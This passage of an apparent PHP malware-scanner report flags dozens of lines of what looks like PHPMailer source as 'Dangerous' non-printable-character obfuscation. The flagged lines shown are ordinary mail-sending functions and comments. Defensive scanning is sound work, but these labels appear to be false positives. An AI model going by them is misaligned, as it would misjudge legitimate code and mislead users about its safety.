</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1611</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1749</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1807</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1890</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2031</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2091</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2132</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2134</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">encodeHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">1</span><span style="color: #007700">]), </span><span style="color: #DD0000">'phrase'</span><span style="color: #007700">) . </span><span style="color: #DD0000">' <' </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2151</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">wrapText</span><span style="color: #007700">(</span><span style="color: #0000BB">$message</span><span style="color: #007700">, </span><span style="color: #0000BB">$length</span><span style="color: #007700">, </span><span style="color: #0000BB">$qp_mode </span><span style="color: #007700">= </span><span style="color: #0000BB">false</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2238</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$message</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2248</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">integer</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2250</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">utf8CharBoundary</span><span style="color: #007700">(</span><span style="color: #0000BB">$encodedText</span><span style="color: #007700">, </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2284</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$maxLength</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2295</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setWordWrap</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2317</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled headers</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createHeader</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2414</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getMailMIME</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2462</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns the whole MIME message</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSentMIMEMessage</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2471</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">rtrim</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailHeader</span><span style="color: #007700">, </span><span style="color: #DD0000">"\n\r"</span><span style="color: #007700">) . </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">CRLF </span><span style="color: #007700">. </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2478</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">generateId</span><span style="color: #007700">() {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2479</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">md5</span><span style="color: #007700">(</span><span style="color: #0000BB">uniqid</span><span style="color: #007700">(</span><span style="color: #0000BB">time</span><span style="color: #007700">()));</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2484</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns an </span><span style="color: #007700">empty </span><span style="color: #0000BB">string on failure</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2487</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The assembled message body</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2489</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">createBody</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2675</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
